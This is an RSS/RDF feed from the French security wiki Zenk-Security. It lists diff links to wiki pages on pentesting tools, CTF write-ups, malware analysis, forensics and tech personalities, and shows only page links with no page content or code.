<?xml version="1.0" encoding="utf-8"?>
<!-- generator="FeedCreator 1.7.2-ppt DokuWiki" -->
<?xml-stylesheet href="http://wiki.zenk-security.com/lib/exe/css.php?s=feed" type="text/css"?>
<rdf:RDF
    xmlns="http://purl.org/rss/1.0/"
    xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
    xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
    xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel rdf:about="http://wiki.zenk-security.com/feed.php">
        <title>Zenk - Security</title>
        <description></description>
        <link>http://wiki.zenk-security.com/</link>
        <image rdf:resource="http://wiki.zenk-security.com/lib/tpl/dokuwiki/images/favicon.ico" />
       <dc:date>2026-04-14T05:26:04+02:00</dc:date>
        <items>
            <rdf:Seq>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=29c3&amp;rev=1356869338&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=aaron_swartz&amp;rev=1516573899&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=active_directory&amp;rev=1669207311&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ada_lovelace&amp;rev=1517073307&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=alsa&amp;rev=1509829165&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=analyse_basique_des_malwares&amp;rev=1371204381&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=analyse_copie&amp;rev=1397507866&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=analyse_d_un_disque_dur_de_donnees&amp;rev=1649280564&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=android&amp;rev=1590167105&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=anonymisation&amp;rev=1526112749&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=antitrust&amp;rev=1509878404&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=app_forensic&amp;rev=1340715491&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=app_stegano&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=app_web&amp;rev=1340913718&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=apprentissage&amp;rev=1340915151&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=archives&amp;rev=1572290623&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=batteries_externes&amp;rev=1735728747&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=burpsuite&amp;rev=1592680968&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=c_c&amp;rev=1572000949&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=c_sharp&amp;rev=1572000974&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=carte_-_cheat_sheet_-_des_outils_pour_pentest_active_directory&amp;rev=1669035392&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_d_investigation_numerique&amp;rev=1663061067&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_en_cryptographie&amp;rev=1663060977&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_l_audit_de_code&amp;rev=1570619191&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_browser&amp;rev=1571832100&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_pentest_active_directory&amp;rev=1662584142&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_webapp&amp;rev=1571832143&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=carte_-_des_outils_pour_wifi&amp;rev=1570619445&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=cheatsheet_wifi&amp;rev=1639054782&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=chiffreur_de_clavier_keyscrambler&amp;rev=1371201279&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=code_scanners&amp;rev=1699609844&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=compilation_de_payloads&amp;rev=1595792441&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=compilation_de_rapports_de_bug_bounty&amp;rev=1604863405&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=compilation_de_ressource&amp;rev=1579641682&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=compilation_de_ressources_outils_reseau&amp;rev=1587748067&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=compilation_de_ressources_outils_web&amp;rev=1595482267&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=compilation_de_vm_web_vulnerables&amp;rev=1582755061&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=config_files&amp;rev=1572001198&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=configurer_burpsuite_sur_genymotion_emulateur_android&amp;rev=1592726170&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=copie_support&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=crypto-monnaie&amp;rev=1610191174&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=csaw2012_quals&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=csaw_ctf_2013_quals&amp;rev=1379974062&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ctf_mssis_ctf&amp;rev=1526287454&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ctf_thc_toulouse_hacking_convention&amp;rev=1523311384&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=dctf_qual_2014&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=dell_personnage_public&amp;rev=1516575918&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=dennis_ritchie&amp;rev=1557686180&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_audit_le_dns&amp;rev=1577879878&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_automatiser_google_hacking_database&amp;rev=1572355129&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_du_post_exploitation&amp;rev=1571831772&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_effacer_ses_traces_sur_un_serveur&amp;rev=1571832274&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_exploiter_les_xxe&amp;rev=1595482399&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_des_tests_d_autorisation&amp;rev=1571831644&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_un_audit_sur_la_cryptographie&amp;rev=1590133204&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_faire_une_cartographie_d_un_site&amp;rev=1599420706&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_la_deserialisation&amp;rev=1600641189&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_outre_passer_les_waf&amp;rev=1572463048&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_race_condition&amp;rev=1591014793&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_cms&amp;rev=1671005636&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_fichiers_et_dossiers_interessant&amp;rev=1577879843&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_webapp_et_des_services_web&amp;rev=1591015127&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_des_xss&amp;rev=1591000867&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_et_exploiter_des_injections_de_template&amp;rev=1572110054&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_et_exploiter_des_lfi&amp;rev=1593107679&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_misconfiguration&amp;rev=1591015018&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_ssrf&amp;rev=1604076834&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_les_xxe&amp;rev=1595482432&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_si_le_site_est_victime_de_malware&amp;rev=1571831688&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_scanner_ssl&amp;rev=1591301880&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_outils_pour_un_scan_complet&amp;rev=1618610994&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_ressources_et_outils_pour_l_exploitation_des_browsers&amp;rev=1574268414&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=des_ressources_et_outils_pour_les_injections_sql&amp;rev=1590763555&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=destruction_de_donnees&amp;rev=1557678223&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=disque_dur&amp;rev=1510514045&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=disque_dur_externe&amp;rev=1516582176&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=dns&amp;rev=1509826951&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ecran_de_veille&amp;rev=1528399367&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=edward_snowden&amp;rev=1516575447&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=eff&amp;rev=1509827871&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=environnement_de_bureau&amp;rev=1590187738&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=erreurnc&amp;rev=1436625673&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ethernet&amp;rev=1576986962&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=exploit_exercises_protostar&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=failles_app&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=failles_web&amp;rev=1581184299&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=films&amp;rev=1699524605&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=firefox&amp;rev=1509885387&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=fonctionnement&amp;rev=1435432355&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_crunch&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_naziwar&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_x93&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=forbiddenbits_2013_x94&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ftp&amp;rev=1509825103&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=gadgets_hardware&amp;rev=1734534206&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=gcc&amp;rev=1509896578&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ghidra&amp;rev=1554158749&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=gimp&amp;rev=1517102833&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=git&amp;rev=1509897779&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=github_leak&amp;rev=1595573440&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=google_chrome&amp;rev=1509794903&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=hack.lu_2014&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=hacking_case&amp;rev=1409606849&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=hackingweek_2014&amp;rev=1393453233&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=htpc&amp;rev=1516787431&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ian_murdock&amp;rev=1557684103&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ide_plugins&amp;rev=1572001251&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=impression_3d&amp;rev=1599144176&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=injection_elf&amp;rev=1571078562&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=installation_de_shadow_defender&amp;rev=1371201515&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=installation_de_windows_xp_et_des_additions_invites_sous_virtualbox&amp;rev=1371197878&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ios&amp;rev=1572172591&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ipfs&amp;rev=1517090070&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=irc&amp;rev=1551369898&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=java&amp;rev=1572000991&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=java_web&amp;rev=1572001011&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=jeux_video&amp;rev=1583507798&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=js_scripts&amp;rev=1572001041&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=kernel_land&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=kit_pentest_android&amp;rev=1657115066&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_achats_en_chine&amp;rev=1509793009&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_cryptographie&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_failles_applicatives&amp;rev=1512987206&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_forensic&amp;rev=1492090240&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_pentesting&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_reseau&amp;rev=1433676573&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_retro-ingenierie&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_steganographie&amp;rev=1474285629&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre-requis_web&amp;rev=1581197376&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=les_pre_requis_systeme&amp;rev=1433680345&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liberte&amp;rev=1597238424&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=licences&amp;rev=1509893032&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=linus_torvalds&amp;rev=1517075743&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=linux&amp;rev=1572001344&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_d_extension_burp&amp;rev=1578088906&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_d_outil_en_ligne&amp;rev=1577960342&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_android&amp;rev=1509813986&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_gnu_linux&amp;rev=1523562712&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_os_x&amp;rev=1509801285&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_de_logiciels_recommandes_pour_windows&amp;rev=1640281613&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_des_entreprises_en_securite_informatique&amp;rev=1343670498&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2018_en_france&amp;rev=1558439430&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2019_en_france&amp;rev=1576057247&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_des_evenements_cybersecurite_2020_en_france&amp;rev=1588080352&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=liste_des_gros_evenements_cybersecurite_2018_en_europe&amp;rev=1549873039&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=listes_des_choses_utiles_indispensables&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=livres&amp;rev=1517087216&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=mark_shuttleworth&amp;rev=1517073526&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=materiel_libre&amp;rev=1510107002&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=mbr&amp;rev=1510513978&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=memoire_vive&amp;rev=1510515381&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=methodologie_et_outils_libres&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=mots_de_passe&amp;rev=1762335896&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=musique&amp;rev=1622310648&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=natas_wargame&amp;rev=1352472295&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh2k12_public&amp;rev=1360341919&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public&amp;rev=1404156546&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_crypto1&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_crypto2&amp;rev=1404989419&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_forensic1&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_stegano1_hzcoin&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_web1&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh_2015_quals&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh_2016_quals&amp;rev=1459684150&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ndh_2018_quals&amp;rev=1522589718&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=nethunter_nexus_5&amp;rev=1587649426&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=newbie_contest&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=nsa&amp;rev=1509845480&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013&amp;rev=1362241195&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_exploitation_3&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_misc_1&amp;rev=1362241599&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_misc_3&amp;rev=1362312965&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_re_2&amp;rev=1362241513&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=olia_lialina&amp;rev=1607422243&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=osce_ctp&amp;rev=1572249732&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=oscp_pwk&amp;rev=1680099756&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=oscp_survival_guide&amp;rev=1738089746&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=oswe_awae&amp;rev=1580550829&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=oswp_wifu&amp;rev=1567346978&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=outils_binaire&amp;rev=1557681930&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=outils_d_analyses&amp;rev=1552295636&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=outils_forensic&amp;rev=1571073427&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=outils_malware&amp;rev=1571739412&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=outils_necessaires_a_l_analyse_des_malwares&amp;rev=1371204463&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=outils_reseau&amp;rev=1560496074&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=outils_web&amp;rev=1571739513&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=overthewire_narnia&amp;rev=1362161395&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=perl&amp;rev=1572001067&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=php&amp;rev=1577801307&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=privilege_escalation&amp;rev=1717495335&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=projets_de_la_communaute&amp;rev=1352378182&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=proposition_d_audit&amp;rev=1389707007&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=proprietaire&amp;rev=1509893138&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=proxmark3easy&amp;rev=1516580228&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=proxmark3v2&amp;rev=1670506114&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pulseaudio&amp;rev=1509829248&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_crypto1&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_forensics1&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_misc1&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_misc2&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_prog1&amp;rev=1404652942&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_reverse1&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_reverse2&amp;rev=1404667200&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_web2&amp;rev=1404667433&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium_ctf&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=pwnium_ctf2k14&amp;rev=1491744837&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=python&amp;rev=1572001104&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=quelque_outils_en_ligne&amp;rev=1558890631&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=rainbow_table&amp;rev=1341238385&amp;do=diff"/>
                <rdf:li rdf:resource="http://wiki.zenk-security.com/doku.php?id=ransomware&amp;rev=1584916816&amp;do=diff"/>
